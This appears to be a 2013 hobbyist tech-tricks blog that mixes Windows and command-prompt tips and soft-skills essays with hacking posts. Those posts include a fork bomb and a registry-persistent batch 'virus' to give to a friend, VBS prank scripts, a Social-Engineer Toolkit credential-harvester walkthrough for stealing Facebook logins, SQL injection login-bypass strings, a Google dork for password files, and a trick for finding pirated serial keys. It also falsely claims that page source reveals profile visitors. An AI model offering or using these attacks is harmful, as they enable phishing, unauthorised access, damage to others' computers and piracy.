Pages

Friday, 29 March 2013

CHECK YOUR COMPUTER IS MALE OR FEMALE



Step 1 : First of all open Notepad.

Step 2 : Now type the code given below in notepad:
CreateObject("SAPI.SpVoice").Speak"i love you"

Step 3 : Now save the file as computer_gender.vbs. (you can save the file with any name like anything.vbs)

Step 4 : Double click the file to run it.
If you hear a male voice, your computer is a male and if you hear a female voice then your computer is a female.

Monday, 25 March 2013

Search Other YouTube Video Without Close Running Video



It is actually a very unique extension. As mentioned, it lets you search YouTube videos while you are watching one, and saves you the hassles of opening a new tab and missing your favorite video.

First Download YT Background Search Plugin For Google Chrome.

You would get a bar type when you install this extension and all you have do is type the video name and click on ‘BG search’ and your screen would get divided. YouTube will show all results on same page

Smallest Virus of the World!! 5 Characters can EAT your machine.

Go to Start > Run> notepad
virus code:
Write this Command on notepad: %0|%0 (This is the Code for Virus)
Save the File with and .bat extension eg. anything.bat
Run the File and See the Magic!!! This will eat you 100% CPU usage.

Dangerous Notepad Virus

Code:
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sysfile /t REG_SZ /d %systemroot%\system32\kb.bat /f
c:
cd\
cd %systemroot%\system32
echo @echo off > kb.bat
echo :hell >> kb.bat
echo start calc.exe >> kb.bat
echo start notepad.exe >> kb.bat
echo start mspaint.exe >> kb.bat
echo goto hell >> kb.bat
Explaination of the Code:
Reg add is the will add the registry entry that will execute kb.bat automatically on computer restart.
Rest of the program will create kb.bat in c:\windows\system32 with the code that will call calculator, notepad and ms-paint in infinite loop.
To rectify: Delete kb.bat from c:\windows\system32.
Give it to your Friend, and Tell him to execute it once, and see the magic on  computer Restart.
Batch Programming is easy and Fun!!

Install windows 8 in USB Drive!!

Microsoft trying hard to compete with Linux, even though Microsoft got a better market,
Linux Got better Features, Like Live OS, Installation on USB Drive etc.
In this Tutorial you will learn how to make a USB Drive that can boot Windows 8, (Best
part: Its not an Attack or a hacking Trick). Its the inbuilt Feature of Windows 8.

Requirements:
USB Drive with minimum 16 GB of space
Installation disk of Windows 8
A Computer running on windows 8.

Steps to roam around with windows 8 are as follows:
Take your mouse on Top right Corner > Goto Settings > Control Panel
Select View > Small Icons from top right Corner in control Panel Window
Select “Windows to go”, and follow the Wizard. That’s all!!

Note:
Insert the Windows 8 DVD and plug in your USB Before Executing “Windows to go”.
Format the USB Drive before installing windows inside it.
One of the window ask for a Bit locker Password, Its for Security and Good habit to Secure your Data. Give a Password if you want to, Its not Mandatory
It is tested and Working Perfectly, Thanks to Microsoft.
And Now Your Windows 8 will Practically Roam Around with you within the Pen drive!! Njy!!
Will soon Upload some big vulnerabilities of Windows 8, Thanks to Microsoft

Sunday, 24 March 2013

Download YOUTUBE videos on your Computer or Mobile without any Software



Follow this Very simple steps:

1. Go to YouTube, Open the video that you want to download

2. Now you have to make a small change in video link, replace "www." or "m." with "ss"

[For example "www.youtube.com/­watch?v=EWnNyT3QTSQ" with "ssyoutube.com/watch?v=EWnNyT3QTSQ"]

3. After it will redirect to a new site "en.savefrom.net/"

4. Now you have to choose the format of the video like mp4,3gp,flv and also shows the video quality like 240p,360p,720p,1080p

Saturday, 23 March 2013

10 virus notepad script

All this comand use to type in notepad

1)Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
2) Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.

How to chat with other computer using comand prompt

 

If you want personal chat with a friend
you don’t need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as “Messenger.bat”. Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After “User” type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press “Enter” it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press “Enter”, and start chatting!

Thursday, 21 March 2013

10 Awesome CMD tricks


1. Use Ctrl-C to Abort a Command
Just about any command can be stopped in its tracks with the abort command: Ctrl-C. If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.
Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know. 

2. View a Command's Results One Page (or Line) at a Time
Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone. One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time. To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.
For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.

Just press the space bar to advance by page or press the Enter key to advance one line at a time.

See Command Prompt Trick #7 below for a different solution to this problem.

3. Run Command Prompt as an Administrator Automatically
Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.
You can always right-click on any Command Prompt shortcut and choose Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.
To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on the Shortcut tab.
4. Become a Command Prompt Power User with Function Keys
The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:
F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste

Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.

5. Hack the Prompt Text
Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable. Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it. One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter. You can always execute prompt alone, without options, to return it to its sometimes boring default.

6. Get Help for Any Command
Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.
I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.
Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.

7. Save a Command's Output to a File
An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators. These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window. Let's say you're about to post a computer problem to an online forum, like my computer support forum for example, and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.
For example, you might execute systeminfo > c:\mycomputerinfo.txt to save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.
 
8. View Your Hard Drive's Entire Directory Structure
I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories. Execute tree from any directory to see the folder structure under that directory.
Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.

9. Customize the Command Prompt Title Bar Text
Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.
For example, let's say your name is Maria Smith, and you want to express your ownership of the Command Prompt: execute title Property of Maria Smith and the Command Prompt's title bar will change immediately.

The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.

The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!

10. Copy From the Command Prompt
As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy. But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.
Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.
Now you can paste that information into whatever program you'd like.

Wednesday, 20 March 2013

15 INTEREG FACTS ABOUT THE LINUX Kernel



Exactly 15 years ago, on March 1994, Linux kernel version 1.0.0 was humbly released for the world to tinker with. To celebrate the historic moment, I have collected some really interesting facts about the Linux kernel. So if you are a Linux fan read on.

1. A 21 year-old Finnish college student created the Linux kernel as a hobby. (Do you know him?)

2. An asteroid was named after the creator of the Linux kernel.

3. Thousands of developers/programmers scattered all around the world are continuously contributing to the development of the Linux kernel.

4. The Linux kernel's official mascot is a penguin named Tux.

5. According to a study funded by the European Union, the estimated cost to redevelop the most recent kernel versions would be at $1.14 billion USD.

6. As of today, only 2% of the Linux kernel has been written by Linus Torvalds.

7. The Linux kernel is written in the version of the C programming language.

8. Linux is now one of the most widely ported operating system kernels, running on a diverse range of systems from handheld computers to mainframe servers.

9. Linux kernel 1.0.0 was released with 176,250 lines of code. The latest Linux kernel has over 10 million lines of code.

10. Microsoft Windows and the Linux kernel can run simultaneously in parallel on the same machine using a software called Cooperative Linux (coLinux).

11. At first, Torvalds wanted to call the kernel he developed Freax but his friend Ari Lemmke, who administered the FTP server where the kernel was first hosted for downloading, named Torvalds' directory linux.

12. A guy name William Della Croce, Jr. trademarked the name Linux and eventually demanded royalties for its use. He later agreed to assign the trademark to Torvalds.

13. The Linux kernel can be found on more than 87% of systems on the world's Top 500 supercomputers.

14. A "vanilla kernel" is not an ice cream flavor but an unmodified version of the Linux kernel.

15. The Linux Kernel is not in any way related to the army rank called ‘Colonel’.

MAKE YOUR LAPTOP AS A VIRTUAL ROUTER



Now open the Command Prompt: click Start > All Programs > Accessories > Command Prompt.

Set the network details:

netsh wlan set hostednetwork mode=allow ssid=YourVirtualNetworkName key=YourNetworkPassword

Start the Wireless Hosted Network:

netsh wlan start hostednetwork

To stop the Wireless Hosted Network:

netsh wlan stop hostednetwork

To see the Wireless Hosted Network details, including the MAC addresses of connected users:

netsh wlan show hostednetwork

How to know if someone, visit's your facebook profile ?


Go to Your facebook profile page.

Right click on your mouse and select 'View Page Source' or just hit Ctrl+U.

Now hit Ctrl+F and search for "ordered_list.top_friends" (without quotes).

You will see a series of profile IDs within quotes.

These are the profile IDs of your friends who visit your profile more often.

The first one visits the most number of time while the last one visits hardly takes a visit.

Copy any one profile ID & paste it in the browser's address bar as 'www.facebook.com\PROFILE-ID' and hit Enter to know who is it.

For Eg. https://www.facebook.com/100004340586271

Great news for Hackers and Backtrack Linux fans


Great news for Hackers and Backtrack Linux fans! The most awaited penetration testing Linux distribution has been released called 'Kali Linux' or 'Backrack 6', from the creators of BackTrack itself. From last 7 years we have seen five awesome versions of Backtrack Linux. But this time to achieve some higher goals, team decided to leave the 4 years old development architecture and 'Kali Linux' born on Mar,13,2013.


Kali Linux is based upon Debian Linux, instead of Ubuntu and new streamlined repositories synchronize with the Debian repositories 4 times a day, constantly providing users with the latest package updates and security fixes available.

Another great feature introduced is that, because of Debian compliant system, it is now able to Bootstrap a Kali Installation/ISO directly from Kali repositories. This allow any user to easily build their own customization of Kali, as well as perform enterprise network installs from a local or remote repository.

The Kali Linux ARM Architecture images work like charm on Samsung ARM Chromebook, Raspberry Pi, ODROID U2 / X2 and SainSmart SS808.

With more than 300 penetration testing tools, completely free, Open source, Vast wireless device support, GPG signed packages and repos, Multi-language, Completely customizable make this distribution one of the best available masterpiece of hacking community.

Once again, default root password is same “toor“, you can download Kali Linux here. http://www.kali.org/downloads/

Enabling Hyper-V on Windows 8

It works as virtual machine.you don't need to install any 3rd party software.
Hyper-V on the Windows client is a feature that we were all waiting for. By default this feature is not enabled, so you will need to do the following steps in order to activate Hyper-V on Windows 8 Client:-

1. Before you start make sure that your machines supports Hardware Server Virtualization and that it has has been enabled in the BIOS

2. On the Metro screen enter “Programs” and search for it under “Settings”

3. Select “Programs and features” and you will see the well known screen where you can add features to Windows 8

4. Select the Hyper- V role as shown in the screenshot below, in order to install Hyper-V on Windows 8

5.After successful installation the machine will need a reboot.

you have done!!!!!!

Tuesday, 19 March 2013

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.


It also includes OS Fingerprinting, Port Scaning and Port Surfing
using various tools

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check
whether the host is alive or not.

To ping a particular host the syntax is (at command prompt)-- 
c:/>ping hostname.com
example:- c:/>ping www.google.com

Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.

Netstat :-  It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc. It's syntax is (at command prompt)
c:/>netstat -n

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.

The basic syntax of Telnet is (at command prompt)--

      c:/>telnet hostname.com

 By default telnet connects to port 23 of remote computer. So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21
                            or
 c:/>telnet 192.168.0.5 21

Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.

It's syntax is (at command prompt)--

      c:/>tracert www.hostname.com

example:- c:/>tracert www.ebay.in    
 

Thursday, 14 March 2013

Adding background images to windows drives


Isn’t it cool to have great wallpaper for your desktop but it might be more fun to have amazing background images for your drives. Drives Background Image is a Windows freeware application that allows you to set a wallpaper for each disk drive on your computer.
This program is very easy to use you only need to select wallpaper for your background, it also provide option to change icons of your drives, changing text color and it provide instant preview of your selected settings.
But  keep in mind that Windows 7 users need administrator privileges while running this program, as the application attempts to modify the configuration of the local hard drives. Its pretty nice program for window customization and every one  should try this tool. Follow below steps to download and learn to use this program.

How to Create Your Own Customized Run Commands


Let me take up an example of how to  create a customized run command for opening the Internet explorer. Once  you create this command, you should be able to open the Internet  explorer just by typing “ie” (without quotes) in the Run dialog box.  Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below
3. Click on “Browse”, navigate to:  Program Files -> Internet Explorer from your Root drive (usually C:\)   and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name  for your shortcut. You can choose any name as per your choice; this  will be your customized “Run command”. In this case I name my shortcut  as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on  your desktop. All you need to do is just copy this shortcut and paste  it in your Windows folder (usually “C:/Windows”). Once you have copied  the shortcut onto your Windows folder, you can delete the one on your  Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized  Run commands for any program of your choice. Say “ff” for Firefox, “ym”  for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the  target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for  this shortcut as per your choice and copy the shortcut file onto the  Windows folder as usual. Now just type this short name in the Run dialog  box to open the program.

Remove shortcut arrow from desktop icons

Here’s how you can remove those shortcut arrows from your desktop icons in Windows XP/7/8.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT/lnkfile
3. Delete the IsShortcut registry value.
 Restart your PC for further changes or simply Logoff.

How to make bootable pendrive by cmd

Instructions

  • 1
    Save all data on your flash drive to another location if you want to keep  it.
  • 2
    Insert the flash drive into a USB port on your computer.
  • 3
    Click the Windows “Start” menu, type “cmd” in the Search field and press  “Enter.” This will bring up the Command Prompt. Type “diskpart” and press  “Enter.” The Diskpart window will open.
  • 4
    Type “list disk” and press “Enter.” In the listed disk drives, find the flash  drive. You will be able to recognize it by its listed size. Type “select  disk 1”, where diskname is the name of your disk. Click  “Enter.”

     
  • 5
    Type “clean” and press “Enter.” This will remove everything on the  drive.
  • 6
    Create a partition by typing “create partition primary” and pressing “Enter.”  Type “select partition 1” and press “Enter.” Type “active” and press  “Enter.”
  • 7
    Type “format fs=fat32 quick” and press “Enter.” This will format the  drive.
  • 8
    Type “assign” and press “Enter.” This will assign a letter to the flash  drive, such as “G.”
  • 9
    Type “exit” and press “Enter.”

Trick to Show Your name after time in taskbar

Try this  trick to add up your name in place of AM and PM beside time
Its simple

Step-1:-
Navigate to -> Start -> Control Panel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to your name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.
 
Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK ..

Tuesday, 12 March 2013

Presentation Skills


Introduction
Do you remember the first presentation you made? Probably those were the college days and as you stood in front of the whole group, you could hear your heart pounding, palms sweating, legs trembling and voice shaking. Over the time you developed your presentational skills by observing others, reading books and most of all from your own experience.
What does it take to make a good presentation?
• Personal qualities
• Subject knowledge
• Knowledge of software like Power Point
You can categorize your comments under the above headings and tell us, what you did you do to improve your presentational skills? If there’s anything more that you think is worth adding, please do include in your comments.


Presentation skills - October 14, 2008 at 18:10 pm by Rajmeet Ghai
Presentation skill is a way in which an idea or scope needs to be discussed. A good presentation creates a good impression.

Points to remember:-

  • Make Use visual slides as much as possible. Use of diagrams, charts is essential.
  • Avoid too many clicks. It may confuse the user.
  • Make use of facts and figures.
  • Avoid the presentation to be very flashy or visually uncomfortable.
  • Structure ideas of a presentation in a standardized way.
  • Make sure the look and feel of the presentation is consistent.
  • Try to know the audience with the help of presentation. It may reduce the discomfort.
  • Avoid an abrupt end to the presentation.

Why presentation skills?

  • Good presentation skills can drive the organization ahead by creating a positive impression
  • It can express ideas more clearly without having them misunderstood.
  • Use of colors and a professional look and feel catches the attention of the audience
  • Use of visual aids helps in understanding concepts faster.
By Nishant Kumar
Although knowledge is very important while delivering on certain topics, presentation adds positive impact to it. No matter how comfortable you are with the topic, you must practice and fine tune knowledge in order to be best. Proper beginning and a logical conclusion is very important elements of presentation skill. While presenting, you need to keep motivating people to participate in order to make interactive session. Too formal presentation looks like lecture.

Delegation Skills

 
Delegation means to authorize someone to work or complete your task. It must be noted that delegated tasks must be ethical. If a task is properly delegated, it can certainly save time and lead to success. Ideally only those tasks should be delegated in which you are good at. This is because delegation may require continuous support and supervision.

Points to remember:-

  • A delegated task must always be approved and agreed upon.
  • A poorly delegated task may lead to a failure and confusion
  • Delegation must be properly used. A task must not be delegated by wish. There must be a valid reason for the same.
  • Delegated tasks should be tracked continuously.
  • They must be valid and possible.
  • The person delegating the task must always be supportive and communicative.
  • A good delegated task is always measurable, defined , achievable
  • Always appreciate when the delegated job is complete.

Why Delegate?

  • Saves time and motivates individuals
  • It’s a management technique to allow people explore new arenas.
  • Helps to establish a rapport between high level and low level hierarchy.
  • Helps to build trust.
  • Leads to a better and higher efficiency.
  • Allows better distribution of job.

When to Delegate?

  • If the task to be delegated has sufficient information to be delegated.
  • If the delegated task can be monitored.
  • If the delegated task can provide some skills to the individual
  • If the deadlines are stringent.
  • If the person whom the task is being delegated does not have a work load.

How to Delegate?

  • Identify the task properly.
  • Identify the risks involved, constraints etc.
  • One needs to be patient. You may be an expert in the domain. The individual may not be.
  • Try and involve more people in the delegation
  • The delegated task must be always agreed upon and not forced.
  • The task must be monitored.

Whom to Delegate?

  • The person’s skill and experience must be considered.
  • How comfortable is the person in accepting the delegated task?
  • The person should not be overloaded with other priority work.

Time Management


Introduction

The most common excuse that people give for not accomplishing a task is lack of time. Have you ever pondered, how do people busier than me do their tasks? Do they have more than 24 hours in their day? Or do they have an extra pair of hands? If not, what is it that sets them different from me? How do they manage their time to maximize their productivity?
If you have any tips on time management that you would like to share with others, please do post your comments.

Time Management - October 14, 2008 at 18:10 pm by Rajmeet Ghai
Time management is the most commonly talked about topic in almost every field. Individuals have too many high priority tasks. However the only issue is that how well can they manage the time or distribute the time to finish them. This problem is faced by almost everyone, be it the CEO of a company or an employee. The most important factor of time management is as to how effectively be the time utilized.

Points to remember:-

  • Always high priority tasks must be completed first.
  • Ambience of the place matters a lot.
  • Each task must be reasonably allotted the time.
  • The key to an effective time management is to know your goals properly.
  • Time management skills don’t come overnight. It is developed with practice.
  • Delegating a task leads to a better time management.
  • The managed tasks must be monitored to ensure they aren’t exceeding the time frame.
  • Make use of available resources. You may be spending time on getting some information already available or known to someone else.
Why manage time?
  • Increases efficiency
  • Reduces anxiety and work pressure.
  • Motivates people and introduces confidence
  • Leads to a better estimation of tasks.
Time management is to ensure that the end product is delivered in time and has quality, productive and efficient.
How to manage time?
  • Make the plan well in advance.
  • Prioritize the important tasks.
  • Have an awareness of the tasks.
  • Create a schedule of managing time that is flexible. This is important to ensure that changes in time can be accommodated
  • Make decisions instantly
  • Monitor the time management schedule.
  • The schedule should not be on a very broad perspective. Its must consider managing time on a daily basis.
  • Activity logs are the most common way to manage time. These logs give details of all activities performed.
  • Always keep alternatives ready.
  • Work as a team and support colleagues

Ethical hacking as a career

 

 
(Ethical hacking, also known…)
George Jason, vice-president, Comguard Networks, in an interview to Diptiman Dewan elaborates on ethical hacking as a rapidly growing career option.
Ethical hacking, also known as penetration testing, intrusion testing or red teaming is used to find loopholes in an IT system and break into it. An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. This work is ethical because it is performed to increase the safety of the computer systems, but only at the request of the company that owns the system and specifically to prevent others from attacking it. With the increasing use of the internet, it has become an essential part of IT security industry today.
 
Industry status
Last year ethical hacking was estimated to be a US$ 3.8 billion industry in the US alone. According to Nasscom, India will require at least 77,000 ethical hackers every year whereas we are producing only 15,000 in a year, currently. Ethical hacking is growing at a tremendous pace and offers a plethora of lucrative job opportunities.
 
Skillset required
First and foremost is the ability to write programmes in many programming languages like C, C++, Perl, Python, and Ruby. For those working with web applications, Microsoft .NET and PHP are vital. Knowledge of assembly language is also essential for those who want to analyse disassembled binaries. Knowledge of a variety of operating systems (Microsoft Windows, various versions of Linux, etc) is critical. Experience with various network devices, including switches, routers and firewalls is also important. An ethical hacker also should have a basic understanding of TCP/IP protocols such as SMTP, ICMP and HTTP. In addition to technical skills, an ethical hacker needs good soft skills. Perhaps the most important skill, however, is adaptability. When testing software and systems, ethical hackers never know what will come up, so the ability to be resourceful is vital.
 
Growth areas
The information security industry is going at a current worldwide growth rate of 21%. Frost & Sullivan have estimated that there are 2.28 million information security professionals worldwide which is expected to increase to nearly 4.2 million by 2015. The need for information security for security compliance in India is mandatory for all companies with an IT backbone. The requirement for such personnel is especially high with organisations in the IT/ITES space.
 
Remuneration
A fresher may work as an intern for a couple of months and can start with a minimum of Rs 2.5 lakh per annum. With one year of experience, one can expect upto Rs 4.5 lakh per annum. Those with work experience five years or more can get from 10-12 lakh per annum.

Monday, 11 March 2013

Most Useful Hotkeys for windows 8


Win : switch between the Start screen and the last-running Windows 8 app
Win + C : displays the Charms: the Settings, Devices, Share and Search options
Win + D : launches the desktop
Win + E : launches Explorer
Win + F : opens the File Search pane
Win + H : opens the Share pane
Win + I : opens Settings
Win + K : opens the Devices pane
Win + L : locks your PC
Win + M : minimises the current Explorer or Internet Explorer window (works in the full-screen IE, too)
Win + O : toggles device orientation lock on and off
Win + P : switch your display to a second display or projector
Win + Q : open the App Search pane
Win + R : opens the Run box
Win + U : open the Ease of Access Centre
Win + V : cycle through toasts (notifications)
Win + W : search your system settings (type POWER for links to all power-related options, say)
Win + X : displays a text menu of useful Windows tools and applets
Win + Z : displays the right-click context menu when in a full-screen app
Win + + : launch Magnifier and zoom in
Win + – : zoom out
Win + , : Aero peek at the desktop
Win + Enter : launch Narrator
Win + PgUp : move the current screen to the left-hand monitor
Win + PgDn : move the current screen to the right-hand monitor
Win + PrtSc : capture the current screen and save it to your Pictures folder
Win + Tab : switch between running apps
On Tablet:
To take a screenshot on a Windows 8 tablet, simultaneously press the Windows button and the volume-down button on the tablet chassis.

 

How To Get Serial Key Of Any Software



Get Serial Key Of Any Software, Jus Follow the Below Steps:
1. Those who use trial versions of softwares.
2. Go to GOOGLE.
3. Type'94fbr' Then ­ space and then name of The software whose key you need.
4.for Example : 94fbr windows xp
5. Google will show you the links with your desired serial key or patch files.

System Security For User



1. Always use a strong password with a combination of alphabets, numbers and special characters

2. Use Original Antivirus. Dont download Cracks & Keygens which are the main entry point for Viruses and Trojans.

3. Use Original Windows OS ( Paid ) or Use Open source OS such as Linux, Ubuntu, Flavours of Linux. Do not use some programs to patch your system.

4. Regularly Update your Antivirus and OS to remove and/or patch vulnerabilities and keep your system secure.

5. Shutdown / Uninstall unwanted programs or programs which you dont use such as FTP, Telnet or any softwares which use your resource.

6. Use Drive Encryption tools to protect your data from data theft and to protect from data loss.

7. Always create a back-up of your important files to a Hard disk or Online Servers ( like Drop box )

8. Never trust any other network to which you connect( OPen WiFi ). Crackers & hackers can compromise your data and also steal your data transmitted .

9. Have a routine check of your computer for defects and patch immediately.

10. Never leave your computer unattended, even for a short time. It is easy for a cracker to inject a virus or spyware into your system.

Secure Browsing Tips



1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your information carefully.

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily activities.

Shut Down Shortcut in windows 8


Windows 8 hides the Power button in the Settings menu, so it takes multistep process just to shut down your PC. But you can pin a Shutdown button right onto the bottom of your desktop using following trick:
  • Create a shortcut on your desktop (right-click, go to New, then Shortcut).
  • Enter “shutdown /s /t 0″ (with no quotes, and, yes, that’s a zero not an “O”) as the location of the item, and press Next.
  • Now name the shortcut (prefereably “Shutdown”) and press Finish.
  • Right-click the shortcut, and navigate to Properties. Choose Change Icon in the Shortcut tab, and then OK to leave the warning box.
  • Choose an icon of your choice from the list. In the screenshot above, you’ll see we chose a Power button.
  • Right-click the shortcut again, and select Pin to Start. You can place the icon on your Start screen wherever it’s convenient. Clicking it will instantly shut down your computer.
  • But which one is the easiest and fastest way to shutdown? Hit power button on your computer!


How to Hide Text behind Text


Introducing a very simple but very rarely known way of hiding a text file inside a text for transmission of secured textual information , thst to in few simple steps .

 Step 1:
Open command prompt and create a text file to where ever location you want or create a text file using windows GUI (in this example we have created our text file with name abc.txt and saved it to the Desktop).

 Step 2:
Go to the location where the file has been saved and use “type” command to view the content of the file.

 Step 3:
Here comes the main step of hiding secret information. A hidden / confidential file is now been created through Echo command and the confidential information is being saved in it.
 Syntax: echo <Secret/confidential message> > host text file (abc.txt in our case) : <secret file name (secret.txt as shown below)>
 We have saved our confidential file (secret.txt) containing confidential data within our host file (abc.txt)
Unhide

Step 4:
To view the content of this hidden file, we need to use the following command after entering into the directory containing host file (abc.txt)

Syntax : start .\<host file(abc.txt)> : <confidential file(secret.txt>


Free Facebook Hacking using Backtrack 5

Hi everybody...
now I am going to tell u how to hack facebook user credentials with backtrack 5 r3
1.open backtrack
2.go to terminal
3.check your ip address with ifconfig command
4.now change your dir as command below given:-
        cd /pentest/exploits/set
5. now enter following command
                   ./test
6.now select social engineering attacks>website attack vectors>credential harvester attack method>site cloner
7.now enter your ip which we already obtained in first step
8.now enter the url to clone
9.send your ip to friend
10.when he/she entered detail the password/username is displayed on your backtrack terminal...


OR

1. open backtrack
2. go to applications>Exploitation tools>Social Engineering Tools>Social engineering toolkit>set..
3.then website attack vectors>credential harvester attackmethod>site cloner..
4.now enter your ip which we already obtained in first step.
5.now enter the url to clone
 6.send your ip to friend
 7.when he/she entered detail the password/username is displayed on your backtrack terminal...


   

Bypass login using SQL Injection Strings



# What is SQL Injection ?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an Application.

# What is SQL Injection Bypass login ?

Basically, this is one of the most easiest way to exploit the SQL Injection Vulnerability. I hope HW readers you might know about SQL Injection and here we are talking about Bypass login using SQL Injection strings. While defacing a Website using SQL Injection attack there is a database of that website which stores login ID and passwords, and if the website is vulnerable to SQL Injection attack then an attacker will try to get admin password using SQL Injection Bypass login. An attacker will insert SQL String in website login form in order to bypass login and Exploit the Vulnerability. >>>

# How to Bypass login using SQL String ?
Requirements :-

SQL Injection Vulnerable website.
SQL Injection Strings code sheet.
Brain.

So, HW readers here, I'm using a vulnerable website to show a tutorial on SQL Injection string code attack to bypass login.

Suppose, we have to bypass login on a website and Enter's into Admin A/c and access website.

For E.g This is the real ID and Password of victim website and it is vulnerable to SQL Injection Attack

Name = Admin
Password = Monkey

Now go to that website login page and Enter this string as follow below >>>>>>
Name = ' or 1=1--
Password = ' or 1=1--

Google Hacking

What is Google Hacking?
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.

usually we use search string to find the info.
example- for password n username we can use this string.just google the string below:-

inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls

Wednesday, 6 March 2013

1000 folder prank

Steps:

 
